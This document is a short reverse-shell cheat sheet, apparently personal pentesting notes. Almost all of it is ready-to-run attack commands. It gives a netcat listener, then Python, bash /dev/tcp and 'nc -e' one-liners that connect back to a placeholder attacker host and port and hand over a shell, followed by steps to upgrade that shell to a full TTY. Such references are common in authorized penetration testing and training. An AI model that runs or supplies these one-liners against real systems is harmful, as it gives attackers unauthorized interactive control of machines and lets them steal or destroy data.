Reverse Shell - Cheat Sheet

Get a Reverse Shell

This is alist of reverse shell ways I've used over time, and it'll be updated when I find and use successfully another one.

In order to get a Reverse shell, first we need to have is a listener in our local machine. Just take note of the port used and the local IP address (lhost), those will be also used in the command used in the remote machine. The simpliest way is with netcat as follows: 

nc -nlvp <PORT>

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

bash

bash -i >& /dev/tcp/<LHOST>/<PORT> 0>&1

netcat

nc -e /bin/sh <LHOST> <PORT>

Upgrade shell

Usually when we get a reverse shell successfully, the shell is limited, we can realize of that because we we try to autocomplete a command or a filename, it print a tabulator (\t).

The easiest and most commen way of upgrade the shell is with python, the only requirement is acutally having python installed in the remote machine, and the follow the next instructions:

python -c "import pty; pty.spawn('/bin/bash')"

export TERM=xterm

Then we need to background the remote shell procress: Ctrl + Z

stty raw -echo; fg

reset

Finally, we'll be prompted with a upgraded shell.